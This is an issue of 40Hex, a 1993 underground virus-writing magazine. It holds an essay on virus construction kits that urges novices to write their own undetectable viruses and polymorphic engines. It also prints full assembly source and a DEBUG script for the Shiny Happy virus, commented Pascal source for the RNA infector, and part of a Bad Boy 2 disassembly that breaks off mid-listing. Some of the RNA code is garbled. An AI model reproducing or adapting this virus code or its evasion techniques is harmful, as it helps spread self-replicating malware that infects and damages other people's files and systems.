40Hex Issue 10 Volume 3 Number 1 File 000 Welcome back to yet another issue of 40Hex, Phalcon/Skism's magazine chock full of virus writing techniques, news, source code, and related info. First off, Phalcon/Skism welcomes its newest member, FirstStrike. We have watched him grow from humble beginnings and are confident that he will continue to produce quality viruses in the future. We will, beginning with this issue, be phasing out the debug scripts in 40Hex. Although many people find them useful, we feel that source code is more interesting and worthwhile. The disassemblies are almost always done by Dark Angel, who advises those with difficulty understanding some parts of the disassemblies to first skim the entire disassembly to learn how the virus works. Some portions, he continues, are not commented because their functions are self-evident and the label names reflect their respective purposes. In the spirit of friendly competition, we have, in this issue, the Ontario 3 virus written by Death Angel of YAM. While on the topic of YAM, we find it immensely amusing that they continue to adamantly state on FidoNet and elsewhere that the IVP was not a mere hack of PS-MPC. Ok, it was a rewrite in Pascal, but the only significant changes were in the labels; even the comments were remarkably familiar. Please cease this farce; you are fooling nobody. 40Hex-10 Table of Contents March 13, 1993 File Description 0000............................You are here 0001............................Virus creation aids 0002............................Phalcon/Skism Shiny Happy virus 0003............................RNA virus source code 0004............................ARCV Busted 0005............................Green Caterpillar Debug Script 0006............................Virus Spotlite: Bad Boy 2 0007............................A Case Against Encryption 0008............................Ontario 3 source code 0009............................40Hex Survey Greets to: NuKE, The Attitude Adjuster, and all virus enthusiasts around the world. Goodbye & best wishes to : Apache Warrior, ICE-9, and the rest of the ARCV. -)Gheap 40Hex Issue 10 Volume 3 Number 1 File 001 The following is a cursory examination of virus construction toolkits. While hardly comprehensive, it includes the basic elements of each toolkit described. For further information, consult appendix A of the Phalcon/Skism G² code generator. --------------------------------------------------------------------------- VIRUS CONSTRUCTION KITS, Revision 2.0 13 February 1993 Virus construction kits are computer programs which allow people with little or no programming experience to produce new variants of computer viruses. Two popular methods are used in virus construction kits. The first uses a menu driven user interface where the user is lead through a series of menus where he 'designs' the replication method, infection criteria and payload (what the virus does when it activates). The second method uses a skeleton configuration file (ASCII file in which virus configurations are placed) and running a 'generator' to produce the virus. There is an important factor to consider. First generation virus construction kits only produce assembled or compiled viruses without source code. Second generation kits produce virus source code (sometimes even commented) that can be changed and assembled by the user. The danger in second generation kits is that someone with very limited programming experience can potentially produce a new computer virus without knowing anything about the internal workings of a virus. I would like to stress that because virus construction kits to date use a fair amount of constant code (instructions), they pose no threat to standard virus detection techniques. However, should future kits make use of mutation engine principles, this situation could change. The following are descriptions of virus construction kits to date. This is a factual description as the author has access to all of the kits listed below : GENVIR GENVIR was the first attempt to release a virus construction kit for profit. It is a first generation virus construction kit which a menu-driven interface. GENVIR is a French program written in 1990 by J.Struss of Lochwiller, France. It is a 'Crippleware' program that lets you go through all the motions of creating a virus, but stops short of the compilation stage. To receive a working copy, one must license the software for a fee of 120 Frances. The latest version is 1.0 and it is believed that GENVIR was never released as a functional virus construction kit. VCS (Virus Construction Set) VCS is a first generation virus kit written in 1991 by a German group called VDV (Verband Deutscher Virenliebhaber). VCS is a primitive program that requires a text file of maximum 512 bytes length and incorporates this text into a simple .COM file virus infector. After a specified number of replications, the virus will display the text message and delete AUTOEXEC.BAT and CONFIG.SYS. The latest release is version 1.0. The program text is in German,although there is a hacked version in English. VCL (Virus Construction Laboratory) VCL is a complex, second generation, menu driven virus construction kit written in 1992 by Nowhere Man and [NuKE] WaReZ. It allows multiple, user selectable modules to be incorporated into the virus, together with the option of creating commented ASM (assembler) source code files that can be manually modified. The danger with this option is that a virus writer can create the virus kernel (without knowing much about the internal workings of viruses) using VCL and then add his own,custom code into the virus.The latest release is version 1.0. PS-MPC (Phalcon / Skism - Mass Produced Code Generator) PS-MPC is a second generation virus construction kit, written by Dark Angel in July 1992. It is based heavily on the VCL virus construction kit. It was distributed including source code in the C language. Although it is not menu driven, (it uses a user definable skeleton configuration file to produce viruses) it creates more compact,neater commented ASM source code than VCL does. Two versions exist,the first being version 0.90beta released together with 40Hex (an underground electronic magazine) on 7 July 1992, and version 0.91beta released on 17 August 1992. According to the history file in this release, the following as been added to the second release : a) rudimentary memory resident viruses may be created, b) improved optimization of code, c) fixed minor quirks and d) got rid of "unsigned char" requirement. IVP (Instant Virus Production Kit) IVP is a second generation virus construction kit, written in 1992 by Admiral Bailey a member of the YAM (Youngsters Against McAfee) underground group. According to the documentation, it was written in Turbo Pascal version 7.0. IVP uses a skeleton configuration approach and produces commented source code. It was the following features : a) .EXE and .COM file infection, b) Trojan support, c) Directory changing, d) encryption, e) error handling, f) COMMAND.COM infection, g) overwriting option and h) random nop generator. The latest release is version 1.0. G2 (G Squared) G2 is a second generation virus construction kit, written in 1993 by Dark Angel of the Phalcon/Skism underground group.(Dark Angel is also the author of the PS-MPC virus construction kit). This kit makes use of the skeleton configuration approach and produces commented source code. According to Dark Angel's documentation, G2 is not a modification of the Phalcon/Skism PS-MPC kit, but a complete rewrite. It differs from other virus construction kits in that it produces easily upgradable and semi-polymorphic routines. The latest release is version 0.70beta, dated January 1, 1993. Oliver Steudler, DYNAMIC SOLUTIONS Authorized McAfee Associates Anti Virus Agent Mail : P.O.Box 4397, Cape Town, 8000, South Africa Internet : Oliver.Steudler@f110.n7102.z5.fidonet.ORG or 100075.0200@compuserve.COM Fidonet : 5:7102/110 CompuServe : 100075,0200 Phone : +27 (21) 24-9504 (GMT +2) Fax : +27 (21) 26-1911 BBS: : +27 (21) 24-2208 [1200-14,400 bps] --------------------------------------------------------------------------- Virus construction tools are cropping up at the rate of one roughly every two months. Additionally, new polymorphic "engines" such as the MtE, TPE, etc. are begining to emerge. But how real is the threat from viruses generated with such tools and has this threat been exaggerated by the media? The discussion will center on the so-called "second generation" toolkits. Perhaps the most prolific of these is Nowhere Man's VCL. It has the most attractive interface of all the recent virus development tools and allows for a variety of activation routines; something which has been conspicuously absent from the Phalcon/Skism code generators. However, VCL is also perhaps the least dangerous of all the toolkits, hampered by the dependance upon only one encryption/decryption routine and single, constant code base. YAM's IVP ameliorates the problem, albeit in a highly limited and somewhat useless fashion, with the random NOP placement. Of course, its code is based heavily upon the PS-MPC, which is also nonrandom, so it, too, is hampered. The PS-MPC, as mentioned earlier, has but a single code base. In short, these three toolkits are of limited utility in terms of creating nonscannable viruses "out of the box." The generated code typically needs to be modified for the viruses to be unscannable. So perhaps the solution lies in relying not upon a single code base, but multiple code bases and allowing for random (not the same as haphazard) placement of individual lines of code. This is the approach of G². G² allows for multiple code packages which accomplish a certain goal. The program selects one of the packages for inclusion in a given virus. In this manner, variability may be ensured. G² further allows for the order of statements to be scrambled in the source file. However, all G² viruses share the same structure as well as having certain bits of code in common. So, while an improvement, it is hardly the final step in the evolution of virus creation toolkits. G² could become much more powerful with multiple virus structures as well as improved code packages. The article above suggested that the toolkits would be much more powerful should they incorporate "mutation engine principles." In other words, the toolkits should be able to mutate the generated code. The IVP currently uses such an approach, albeit only with simple NOPs liberally scattered in the decryption and delta offset calculation routines. Such code, however, should not be a goal of the authors of such toolkits. It is simply not appropriate for a virus creator to function in such a manner. A virus toolkit which simply spews out the same code in various forms is merely an overblown hack generator. Toolkits exist as _aids_ in writing a virus, not as replacements. Surely including such mutation routines would result in larger viruses as well as illegible code. A novice utilising the toolkit would not be able to learn from such unoptimised code. Tight code which doesn't sacrifice legibility should always be the goal of virus generators. Another aid in writing viruses is the "encryptor-in-a-box," a product such as MtE or TPE. Such modules allow all viruses to incorporate polymorphic routines. Yet how dangerous are such polymorphers? As they currently exist, they pose very little threat. Scanners have adapted not only to catch current MtE-using viruses reliably, but also to find new viruses which use decryptors created with MtE. Certainly the TPE and any new polymorphic routines will meet the same fate. Constant revisions of these engines, while being temporary solutions, remain just that: temporary. Once the anti-virus industry receives a copy of the new version, the engine is once again useless. The virus community should look beyond such "easy fixes" as virus creation toolkits and polymorphic "engines." The simplest way to get a nonscannable virus is to write it yourself. Not only is there the benefit of satisfaction with the work, but you gain expertise and intimate understanding of both viruses and the operating system. Such knowledge comes only with writing several viruses on your own. The best way for a beginner to learn how to write viruses is to figure it out on his own _without_ any examples. Once a virus has been written in this manner, then it is appropriate to look at current virus samples to find out the various tried and true techniques. But polymorphic engines are difficult to write, the novice virus writer protests; using MtE will vastly improve the virus. Rubbish. Firstly, it is a fact that scanners will be able to detect the virus, be it encrypted with a simple XOR loop or with MtE. Writing your own encryption will be far better in terms of learning. Secondly, polymorphic engines are _not_ terribly difficult to create. A few hours of thinking will be sufficient to lay down the framework of a polymorphic engine. An additional few days is enough for coding. Even the MtE and TPE, while requiring bit-level knowledge of the opcodes, could have been written by a person with only a few years of experience programming assembly. The advantages of writing your own polymorphic engine are obvious; anti-virus developers will have to spend much time (and space in their products) analysing and developing scanners for each individual engine; and simply adding a few extra garbling instructions should be sufficient to throw these scanners off in a future virus. So what purpose do these tools serve? The ultimate aim of those producing the virus creation tools should be not to enable people to go around creating new, unscannable viruses and trashing every hard drive in the world, but to allow novices to break into the field of virus writing. It is not difficult to write a virus, but these tools certainly ease the initial pain. Polymorphic engines are useful as examples for your own polymorphic routines. I encourage all novice programmers to pick up a copy of Phalcon/Skism's G² and VCL, the two most prolific code generation toolkits. Run them a few times with various parameters and analyse the code carefully. Print out the code and look it over. The basic principles of virus creation will be apparent after some inspection. Learn from it and then sit down and write your own virus from scratch. Dark Angel Phalcon/Skism 1993 40Hex Issue 10 Volume 3 Number 1 File 002 The Phalcon/Skism Shiny Happy Virus This virus was written jointly by Dark Angel and Hellraiser about six months ago. It is a simple semi-stealth virus that doesn't actually replace interrupt 21h's vector in the interrupt table. Instead, it finds the DOS interrupt 21h entry point and encodes an int 3 as the first byte. Consequently, it is highly debugger-resistant. It also hides the file size increase, albeit only in DOS directory listings. This way, it avoids the CHKDSK cross-linking errors common to viruses hooking FCB find first/next. The virus infects upon file executions. A debug script follows the source code. As always, type "DEBUG < DEBUG.SCR > NUL" to create the virus from the debug script. The virus always activates, hooking the keyboard interrupt. When it detects a happy face (emoticon), the virus changes it to a frown. The Shiny Happy residency test follows: Run the cursor across the following line: :-) =) \|-) ;) :*) If any of the faces changed to frowns, then Shiny Happy is loose on your system. -)Gheap ------------------------------------------------------------------------------- ; The Shiny Happy Virus ; By Hellraiser and Dark Angel of Phalcon/Skism .model tiny .code id = '52' timeid = 18h shiny: call next next: pop bp push ds push es xor di,di mov ds,di cmp word ptr ds:[1*4],offset int1_2 ; installation check jz return mov ax,es dec ax sub word ptr ds:[413h],(endheap-shiny+1023)/1024 mov ds,ax sub word ptr ds:[3],((endheap-shiny+1023)/1024)*64 sub word ptr ds:[12h],((endheap-shiny+1023)/1024)*64 mov es,word ptr ds:[12h] push cs pop ds lea si,[bp+shiny-next] mov cx,(endheap-shiny+1)/2 rep movsw push cs lea ax,[bp+return-next] push ax push es mov ax,offset highentry push ax retf return: cmp sp,id-4 jz returnEXE returnCOM: pop es pop ds mov di,100h push di lea si,[bp+offset save3-next] movsw movsb retn returnEXE: pop es pop ds mov ax,es add ax,10h add word ptr cs:[bp+origCSIP+2-next],ax cli add ax,word ptr cs:[bp+origSPSS-next] mov ss,ax mov sp,word ptr cs:[bp+origSPSS+2-next] sti db 0eah origCSIP db ? save3 db 0cdh,20h,0 origSPSS dd ? highentry: mov cs:in21flag,0 xor ax,ax mov ds,ax les ax,ds:[9*4] mov word ptr cs:oldint9,ax mov word ptr cs:oldint9+2,es mov ds:[9*4],offset int9 mov ds:[9*4+2],cs les ax,ds:[21h*4] mov word ptr cs:oldint21,ax mov word ptr cs:oldint21+2,es mov word ptr ds:[1*4],offset int1 mov ds:[1*4+2],cs mov ah, 52h int 21h mov ax,es:[bx-2] mov word ptr cs:tunnel21+2, ax mov word ptr cs:dosseg_, es pushf pop ax or ah,1 push ax popf mov ah,0bh pushf db 09Ah oldint21 dd ? mov word ptr ds:[3*4],offset int3 mov ds:[3*4+2],cs mov word ptr ds:[1*4],offset int1_2 les bx,cs:tunnel21 mov al,0CCh xchg al,byte ptr es:[bx] mov byte ptr cs:save1,al retf authors db 'Shiny Happy Virus by Hellraiser and Dark Angel of Phalcon/Skism',0 int1: push bp mov bp,sp push ax mov ax, [bp+4] cmp ax,word ptr cs:tunnel21+2 jb foundint21 db 3dh ; cmp ax, xxxx dosseg_ dw ? ja exitint1 foundint21: mov word ptr cs:tunnel21+2,ax mov ax,[bp+2] mov word ptr cs:tunnel21,ax and byte ptr [bp+7], 0FEh exitint1: pop ax pop bp iret int1_2: push bp mov bp,sp push ax mov ax, [bp+4] cmp ax,word ptr cs:tunnel21+2 ja exitint1_2 mov ax, [bp+2] cmp ax,word ptr cs:tunnel21 jbe exitint1_2 push ds push bx lds bx,cs:tunnel21 mov byte ptr ds:[bx],0CCh pop bx pop ds and byte ptr [bp+7],0FEh exitint1_2: pop ax pop bp iret infect_others: mov ax,4301h push ax push ds push dx xor cx,cx call callint21 mov ax,3d02h call callint21 xchg ax,bx mov ax,5700h call callint21 push cx push dx mov ah,3fh mov cx,1ah push cs pop ds push cs pop es mov dx,offset readbuffer call callint21 mov ax,4202h xor cx,cx cwd int 21h mov si,offset readbuffer cmp word ptr [si],'ZM' jnz checkCOM checkEXE: cmp word ptr [si+10h],id jz goalreadyinfected mov di, offset OrigCSIP mov si, offset readbuffer+14h movsw movsw sub si, 18h-0eh movsw movsw push bx mov bx, word ptr readbuffer + 8 mov cl, 4 shl bx, cl push dx push ax sub ax, bx sbb dx, 0 mov cx, 10h div cx mov word ptr readbuffer+14h, dx mov word ptr readbuffer+16h, ax mov word ptr readbuffer+0Eh, ax mov word ptr readbuffer+10h, id pop ax pop dx pop bx add ax, heap-shiny adc dx, 0 mov cl, 9 push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 1 mov word ptr readbuffer+4, dx mov word ptr readbuffer+2, ax mov cx,1ah jmp short finishinfection checkCOM: xchg cx,ax sub cx,heap-shiny+3 cmp cx,word ptr [si+1] goalreadyinfected: jz alreadyinfected add cx,heap-shiny push si mov di,offset save3 movsw movsb pop di mov al,0e9h stosb mov ax,3 ; cx holds bytes to write xchg ax,cx stosw finishinfection: push cx mov ah,40h mov cx,heap-shiny cwd ; xor dx,dx call callint21 mov ax,4200h xor cx,cx cwd int 21h mov ah,40h pop cx mov dx,offset readbuffer call callint21 mov ax,5701h pop dx pop cx and cl,0E0h or cl,timeid call callint21 jmp doneinfect alreadyinfected: pop ax pop ax doneinfect: mov ah,3eh call callint21 pop dx pop ds pop ax pop cx call callint21 exitexecute: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax popf jmp exitint21 execute: pushf push ax push bx push cx push dx push si push di push ds push es cld mov ax,4300h call callint21 jc exitexecute push cx jmp infect_others int3: push bp mov bp,sp cmp cs:in21flag,0 jnz leaveint21 inc cs:in21flag cmp ah,11h jz findfirstnext cmp ah,12h jz findfirstnext cmp ax,4b00h jz execute exitint21: dec cs:in21flag leaveint21: or byte ptr [bp+7],1 ; set trap flag upon return dec word ptr [bp+2] ; decrement offset call restoreint21 pop bp iret callint21: pushf call dword ptr cs:tunnel21 ret restoreint21: push ds push ax push bx lds bx,cs:tunnel21 mov al,byte ptr cs:save1 mov ds:[bx],al pop bx pop ax pop ds ret findfirstnext: int 21h ; pre-chain interrupt ; flags [bp+12] ; segment [bp+10] ; offset [bp+8] ; flags [bp+6] ; segment [bp+4] ; offset [bp+2] ; bp [bp] pushf ; save results pop [bp+6+6] pop bp push ax push bx push ds push es inc al jz notDOS mov ah,51h ; Get active PSP int 21h mov es,bx cmp bx,es:[16h] ; DOS calling it? jne notDOS mov ah,2fh ; DTA -> ES:BX int 21h push es pop ds cmp byte ptr [bx],0FFh jnz regularFCB add bx,7 regularFCB: cmp word ptr [bx+9],'OC' jz checkinf cmp word ptr [bx+9],'XE' jnz notDOS checkinf: mov al,byte ptr [bx+23] and al,1Fh cmp al,timeid jnz notDOS subtract: sub word ptr [bx+29],heap-shiny sbb word ptr [bx+31],0 notDOS: pop es pop ds pop bx pop ax dec cs:in21flag cli add sp,6 iret int9: pushf ; save flags, regs, etc... push ax push bx push cx push dx xor bx,bx mov ah,0fh ; get video mode int 10h mov ah,03h ; get curs pos int 10h call getattrib cmp al,')' ; happy?? jne audi5000 ; no mov cs:eyesflag,0 beforeloveshack: call getattrib ; see if there is a nose loveshack: cmp al,':' ; shiny??? je realeyes cmp al,'=' ; check for even =) je realeyes cmp al,'|' je realeyes cmp al,';' je realeyes cmp cs:eyesflag,0 jnz audi5001 cmp al,'(' jz audi5001 inc cs:eyesflag inc bl jmp short beforeloveshack realeyes: stc adc dl,bl ; add extra backspace if so mov ah,02h int 10h mov ax,0a28h ; 0ah, '(' ; write frown mov cx,1 int 10h jmp audi5000 audi5001: stc adc dl,bl audi5000: inc dl ; set curs pos mov ah,02h int 10h pop dx ; restore all stuff pop cx pop bx pop ax popf db 0eah oldint9 dd ? ; reads the char at the current cursorpos - 1 getattrib: dec dl ; set curs pos mov ah,02h int 10h mov ah,08h ; get char at curs int 10h ret heap: save1 db ? tunnel21 dd ? in21flag db ? eyesflag db ? readbuffer db 1ah dup (?) endheap: end shiny ------------------------------------------------------------------------------- n shiny.com e 0100 E8 00 00 5D 1E 06 33 FF 8E DF 81 3E 04 00 4D 01 e 0110 74 2D 8C C0 48 83 2E 13 04 01 8E D8 83 2E 03 00 e 0120 40 83 2E 12 00 40 8E 06 12 00 0E 1F 8D 76 FD B9 e 0130 DD 01 F3 A5 0E 8D 46 3C 50 06 B8 71 00 50 CB 81 e 0140 FC 2E 35 74 0C 07 1F BF 00 01 57 8D 76 67 A5 A4 e 0150 C3 07 1F 8C C0 05 10 00 2E 01 46 68 FA 2E 03 46 e 0160 6A 8E D0 2E 8B 66 6C FB EA 00 CD 20 00 00 00 00 e 0170 00 2E C6 06 9E 03 00 33 C0 8E D8 C4 06 24 00 2E e 0180 A3 8A 03 2E 8C 06 8C 03 C7 06 24 00 26 03 8C 0E e 0190 26 00 C4 06 84 00 2E A3 C5 00 2E 8C 06 C7 00 C7 e 01A0 06 04 00 28 01 8C 0E 06 00 B4 52 CD 21 26 8B 47 e 01B0 FE 2E A3 9C 03 2E 8C 06 37 01 9C 58 80 CC 01 50 e 01C0 9D B4 0B 9C 9A 00 00 00 00 C7 06 0C 00 85 02 8C e 01D0 0E 0E 00 C7 06 04 00 4D 01 2E C4 1E 9A 03 B0 CC e 01E0 26 86 07 2E A2 99 03 CB 53 68 69 6E 79 20 48 61 e 01F0 70 70 79 20 56 69 72 75 73 20 62 79 20 48 65 6C e 0200 6C 72 61 69 73 65 72 20 61 6E 64 20 44 61 72 6B e 0210 20 41 6E 67 65 6C 20 6F 66 20 50 68 61 6C 63 6F e 0220 6E 2F 53 6B 69 73 6D 00 55 8B EC 50 8B 46 04 2E e 0230 3B 06 9C 03 72 05 3D 00 00 77 0F 2E A3 9C 03 8B e 0240 46 02 2E A3 9A 03 80 66 07 FE 58 5D CF 55 8B EC e 0250 50 8B 46 04 2E 3B 06 9C 03 77 1A 8B 46 02 2E 3B e 0260 06 9A 03 76 10 1E 53 2E C5 1E 9A 03 C6 07 CC 5B e 0270 1F 80 66 07 FE 58 5D CF B8 01 43 50 1E 52 33 C9 e 0280 E8 32 01 B8 02 3D E8 2C 01 93 B8 00 57 E8 25 01 e 0290 51 52 B4 3F B9 1A 00 0E 1F 0E 07 BA A0 03 E8 14 e 02A0 01 B8 02 42 33 C9 99 CD 21 BE A0 03 81 3C 4D 5A e 02B0 75 5C 81 7C 10 32 35 74 5D BF 69 00 BE B4 03 A5 e 02C0 A5 83 EE 0A A5 A5 53 8B 1E A8 03 B1 04 D3 E3 52 e 02D0 50 2B C3 83 DA 00 B9 10 00 F7 F1 89 16 B4 03 A3 e 02E0 B6 03 A3 AE 03 C7 06 B0 03 32 35 58 5A 5B 05 99 e 02F0 03 83 D2 00 B1 09 50 D3 E8 D3 CA F9 13 D0 58 80 e 0300 E4 01 89 16 A4 03 A3 A2 03 B9 1A 00 EB 1D 91 81 e 0310 E9 9C 03 3B 4C 01 74 3E 81 C1 99 03 56 BF 6A 00 e 0320 A5 A4 5F B0 E9 AA B8 03 00 91 AB 51 B4 40 B9 99 e 0330 03 99 E8 80 00 B8 00 42 33 C9 99 CD 21 B4 40 59 e 0340 BA A0 03 E8 6F 00 B8 01 57 5A 59 80 E1 E0 80 C9 e 0350 18 E8 61 00 EB 02 58 58 B4 3E E8 58 00 5A 1F 58 e 0360 59 E8 51 00 07 1F 5F 5E 5A 59 5B 58 9D EB 35 9C e 0370 50 53 51 52 56 57 1E 06 FC B8 00 43 E8 36 00 72 e 0380 E3 51 E9 F3 FE 55 8B EC 2E 80 3E 9E 03 00 75 19 e 0390 2E FE 06 9E 03 80 FC 11 74 34 80 FC 12 74 2F 3D e 03A0 00 4B 74 CB 2E FE 0E 9E 03 80 4E 07 01 FF 4E 02 e 03B0 E8 09 00 5D CF 9C 2E FF 1E 9A 03 C3 1E 50 53 2E e 03C0 C5 1E 9A 03 2E A0 99 03 88 07 5B 58 1F C3 CD 21 e 03D0 9C 8F 46 0C 5D 50 53 1E 06 FE C0 74 3B B4 51 CD e 03E0 21 8E C3 26 3B 1E 16 00 75 2E B4 2F CD 21 06 1F e 03F0 80 3F FF 75 03 83 C3 07 81 7F 09 43 4F 74 07 81 e 0400 7F 09 45 58 75 12 8A 47 17 24 1F 3C 18 75 09 81 e 0410 6F 1D 99 03 83 5F 1F 00 07 1F 5B 58 2E FE 0E 9E e 0420 03 FA 83 C4 06 CF 9C 50 53 51 52 33 DB B4 0F CD e 0430 10 B4 03 CD 10 E8 56 00 3C 29 75 42 2E C6 06 9F e 0440 03 00 E8 49 00 3C 3A 74 21 3C 3D 74 1D 3C 7C 74 e 0450 19 3C 3B 74 15 2E 80 3E 9F 03 00 75 1E 3C 28 74 e 0460 1A 2E FE 06 9F 03 FE C3 EB D8 F9 12 D3 B4 02 CD e 0470 10 B8 28 0A B9 01 00 CD 10 EB 03 F9 12 D3 FE C2 e 0480 B4 02 CD 10 5A 59 5B 58 9D EA 00 00 00 00 FE CA e 0490 B4 02 CD 10 B4 08 CD 10 C3 rcx 0399 w q ------------------------------------------------------------------------------- 40Hex Issue 10 Volume 3 Number 1 File 003 The following is the source code for the RNA virus, a Pascal virus which preserves the functionality of the EXE files which it infects. It is a primitive virus, but is an example of a parasitic virus not written in assembly. ------------------------------------------------------------------------------- {$i-}{$m 2048,0,24576} Program RNA; { Commenting by Dark Angel of Phalcon/Skism } { for 40Hex Issue 10 Volume 3 Number 1 } uses dos; const blksize=8192; { buffer size } vsize=7200; { length of virus } wc='*.'; { part of file mask } counter=blksize-1; { location of the counter } cb=':\'; { colon backslash } maxinf:byte=4; { max # infections } maxruns:byte=48; { # runs before disinfection } drives:array[3..4] of char=('C','D'); { name of the drives } imf:string[12]='ux142.rqz'; { temporary file name } type vtype=array[1..vsize] of byte; { type of buffer for storing virus } buftype=array[1..blksize] of byte; { type of buffer for file operations } var ps:string; { path string } s:pathstr; { currently running program } ds:dirstr; { current directory } ns:namestr; { filename of current program } es:extstr; { extension of current program } v:^vtype; { buffer for virus code } buf:^buftype; { buffer for file copying } count,indx,inf:byte; attr,nr,nw:word; sr:searchrec; { for find first/find next calls } f,f2:file; { file handles } t:longint; { file time/date storage } procedure copyf; { copy file } begin repeat { copy the file in blocks } blockread(f,buf^,blksize,nr); { read from the source file } blockwrite(f2,buf^,nr,nw); { write to the target file } until (eof(f)); { stop if end of file reached } close(f); { close the source file } setftime(f2,t); { set file time/date of target } close(f2); { then close target file } end; Procedure stripf; { strip virus from the file } begin assign(f,s); { f = handle for current file } reset(f,1); { prepare it for reading } getftime(f,t); { save file creation time/date } assign(f2,ds+imf); { create temporary file } rewrite(f2,1); { prepare for writing } seek(f,vsize); { go past virus } copyf; { and copy uninfected file } end; procedure load; { load the virus from carrier file } begin assign(f,s); { f = handle for current file } getfattr(f,attr); { get its file attributes } reset(f,1); { and prepare it for reading } if ioresult=0 then { continue if no failure } begin getftime(f,t); { get file creation time/date } blockread(f,v^,vsize,nr); { read the virus to buffer } count:=v^[vsize]-1; { get the counter from the buffer } { and decrement it } v^[vsize]:=maxruns; { reset counter in buffer } seek(f,vsize-1); { go to generation counter in buffer } blockwrite(f,count,1,nr); { write new counter to file } setftime(f,t); { restore file time/date } close(f); { close the file } setfattr(f,attr); { restore its file attributes } end; end; function checkf(pth:dirstr):boolean; { check if file already infected } var by:array[1..27] of byte; { buffer for checking marker bytes } begin checkf:=false; { default to don't infect } if pos(sr.name,'COMMAND.COM')=0 then { don't infect COMMAND.COM } begin assign(f,pth+sr.name); { get filename } reset(f,1); { open for reading } if ioresult=0 then { continue if open ok } begin blockread(f,by,27,nr); { start checking the file } for indx:=1 to 27 do { to see if the virus is } if (by[indx])<>(v^[indx]) then { already there } checkf:=true; { if not, return infect ok } close(f); { close the file } end; end; end; procedure attach(pth:dirstr); { attach virus to start of file } begin inc(inf); { increment infection counter } assign(f2,pth+'zSqA.th'); { create temporary file } rewrite(f2,1); { open for writing } if ioresult=0 then { continue if no errors } begin assign(f,pth+sr.name); { open file to infect } getfattr(f,attr); { save its attributes } reset(f,1); { open for reading } getftime(f,t); { save its creation time/date } blockwrite(f2,v^,vsize,nr); { write the virus to the temp file } copyf; { copy the file to infect to the } erase(f); { temp file and erase original } rename(f2,sr.name); { rename the temp file to the name } setfattr(f2,attr); { of the original and restore file } end; { attributes } end; procedure rep(pth:dirstr;ext:extstr); { replicate within a directory } begin findfirst(pth+wc+ext,hidden+archive+readonly,sr); while (inf'') do { while more directories } begin indx:=pos(';',ps); { go to next directory } if indx=0 then { if not found, then at } begin { last directory } tmp:=ps; { copy directory name to } ps:=''; { variable } end else begin tmp:=copy(ps,1,indx-1); { copy directory name to } ps:=copy(ps,indx+1,length(ps)-indx); { variable } end; if tmp[length(tmp)]<>'\' then tmp:=tmp+'\'; { concatenate '\' if it } { isn't already there } rep(tmp,'cOm'); { infect *.COM } rep(tmp,'exE'); { infect *.EXE } end; end; procedure makep; { this makes a path if it } { isn't found in the system } var b:byte; begin getdir(0,ps); { get current drive } for b:=3 to 4 do { do this for C: and D: } begin ps:=ps+';'+drives[b]+cb+';'; { copy each drive to path } findfirst(drives[b]+cb+wc,directory,sr); { check if dirs on drive } while (doserror=0) and (length(ps)<240) do { if not, continue } begin ps:=ps+drives[b]+cb+sr.name+';'; { add all dirs to the path } findnext(sr); { do it again and again } end; end; end; procedure grow; begin inf:=0; { reset infection counter } ps:=getenv('path'); { get the current path } if ps<>'' then replicate; { infect files if path found } if infinterrupt table mov ax,ds:21h*4 ; save old int 21h handler mov es:oldint21,ax mov ax,ds:21h*4+2 mov word ptr es:oldint21+2,ax mov ah,30h ; get DOS version int 21h cmp ax,1E03h ; 3.X? jne not_DOS_3X ; skip if not mov es:origint21,1460h ; use known value for int 21h mov ax,1203h ; get DOS segment push ds int 2Fh mov word ptr es:origint21+2,ds pop ds jmp short is_DOS_3X nop not_DOS_3X: mov ax,ds:21h*4 mov es:origint21,ax mov ax,ds:21h*4+2 mov word ptr es:origint21+2,ax is_DOS_3X: cli ; set new int 21h handler mov ax,es:int21pointer mov ds:21h*4,ax mov ax,es mov ds:21h*4+2,ax sti mov cx,es mov ah,13h ; get old DOS disk handler int 2Fh ; to es:bx push es mov es,cx mov es:DOSdiskOFF,dx mov es:DOSdiskSEG,ds pop es int 2Fh ; restore DOS disk handler jmp cs:exitviruspointer endinstall: exitvirus: push cs ; copy return routine to push cs ; buffer at end of file pop ds ; and transfer control pop es ; to it mov si,cs:exitviruspointer add si,offset return_to_COM - offset exitvirus ;nop mov di,cs:filesize add di,offset endvirus push di mov cx,offset end_return_to_COM - offset return_to_COM cld rep movsb retn ; jmp to return_to_COM return_to_COM: mov si,cs:filesize add si,100h cmp si,offset endvirus ; check if small file jae not_negative ; if not, skip next mov si,offset endvirus ; adjust for too small not_negative: mov di,100h mov cx,offset endvirus - offset start - 1 ; ???? rep movsb ; copy old file to start mov ax,100h ; and exit the virus push ax retn end_return_to_COM: endexitvirus: restoreint21: xor di,di mov ds,di cli mov di,cs:oldint21 mov ds:21h*4,di mov di,word ptr cs:oldint21+2 mov ds:21h*4+2,di sti retn plea db 'Make me better!' endrestoreint21: int24: mov al,3 iret message db 'The Bad Boy virus, Version 2.0, Copyright (C) 1991.',0 endint24: int21: push bx push si push di push es push ax cmp ax,4B00h ; check if execute jz execute ; continue if so jmp short exitint21 nop execute: push ds push cs pop es xor ax,ax mov ds,ax mov si,24h*4 ; get old int 24h mov di,offset oldint24 ; handler movsw movsw mov ax,cs:int24pointer cli ; set new critical error mov ds:24h*4,ax ; handler mov ax,cs mov ds:24h*4+2,ax sti pop ds mov ax,3D00h ; open file read only pushf call dword ptr cs:oldint21 jc restore_exitint21 mov bx,ax ; handle to bx call cs:infectpointer pushf mov ah,3eh ; close file pushf call dword ptr cs:oldint21 popf jc restore_exitint21 push ds cli ; subvert nasty disk xor ax,ax ; monitoring programs mov ds,ax mov ax,cs:DOSdiskOFF xchg ax,ds:13h*4 mov cs:DOSdiskOFF,ax mov ax,cs:DOSdiskSEG xchg ax,ds:13h*4+2 mov cs:DOSdiskSEG,ax sti pop ds restore_exitint21: push ds xor ax,ax mov ds,ax mov ax,cs:oldint24 mov ds:24h*4,ax mov ax,word ptr cs:oldint24+2 mov ds:24h*4+2,ax pop ds exitint21: pop ax pop es pop di pop si pop bx jmp dword ptr cs:oldint21 endint21: infect: push cx push dx push ds push es push di push bp push bx mov ax,1220h ; get JFT entry for file int 2Fh ; handle bx mov bl,es:[di] xor bh,bh mov ax,1216h ; get associated SFT int 2Fh ; entry to es:di pop bx mov ax,es:[di+11h] ; get file size cmp ax,0F000h ; exit if too large jb not_too_large jmp errorinfect not_too_large: mov word ptr es:[di+2],2 ; set to read/write mode mov ax,es:[di+11h] ; get file size (again) mov cs:filesize,ax ; save it mov 